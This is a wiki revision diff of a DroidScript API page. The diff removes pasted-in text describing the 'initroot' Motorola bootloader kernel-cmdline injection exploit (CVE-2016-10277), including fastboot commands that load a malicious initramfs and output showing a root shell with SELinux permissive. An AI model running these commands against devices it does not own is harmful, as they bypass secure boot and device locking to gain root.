This shows you the differences between two versions of the page.
Both sides previous revision Previous revision Next revision | Previous revision | ||
built_in:start [2018/12/30 13:41] 182.1.63.175 [Built-in features - DroidScript API] |
built_in:start [2018/12/31 01:07] (current) |
||
---|---|---|---|
Line 1: | Line 1: | ||
- | Sources: | + | ======Built-in features - DroidScript API====== |
- | https:// | + | |
- | https:// | + | |
- | initroot: Motorola Bootloader Kernel Cmdline Injection Secure Boot & Device Locking Bypass (CVE-2016-10277) | ||
- | By Roee Hay / Aleph Research, HCL Technologies | ||
- | |||
- | Recap of the Vulnerability and the Tethered-jailbreak | ||
- | |||
- | 1. Vulnerable versions of the Motorola Android Bootloader (ABOOT) allow for kernel command-line injection. | ||
- | 2. Using a proprietary fastboot OEM command, only available in the Motorola ABOOT, we can inject, through USB, a parameter named initrd which allows us to force the Linux kernel to populate initramfs into rootfs from a specified physical address. | ||
- | 3. We can abuse the ABOOT download functionality in order to place our own malicious initramfs at a known physical address, named SCRATCH_ADDR (see here for a list of devices). | ||
- | 4. Exploiting the vulnerability allows the adversary to gain unconfined root shell. | ||
- | 5. Since the initramfs payload is injected into RAM by the adversary, the vulnerability must be re-exploited on every reboot. | ||
- | For example, here is a successful run of the exploit on cedric (Moto G5) | ||
- | |||
- | $ fastboot oem config fsg-id "a initrd=0xA2100000, | ||
- | $ fastboot flash aleph initroot-cedric.cpio.gz | ||
- | $ fastboot continue | ||
- | |||
- | $ adb shell | ||
- | cedric:/ # id | ||
- | uid=0(root) gid=0(root) groups=0(root), | ||
- | cedric:/ # getenforce | ||
- | Permissive | ||
- | cedric:/ # | ||
- | |||
- | |||
- | Proof of Concept: | ||
- | https:// | ||
- | |||
- | | ||
====Links==== | ====Links==== | ||
^App and Layout^ | ^App and Layout^ |